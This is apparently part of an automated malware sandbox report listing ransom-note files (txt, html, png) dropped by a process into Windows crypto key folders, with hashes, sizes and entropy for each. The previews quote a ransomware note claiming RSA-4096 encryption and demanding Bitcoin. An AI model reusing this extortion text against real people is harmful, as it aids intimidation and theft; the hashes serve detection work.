                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\DSS\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\Keys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\PCPKSP\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\RSA\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\SystemKeys\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
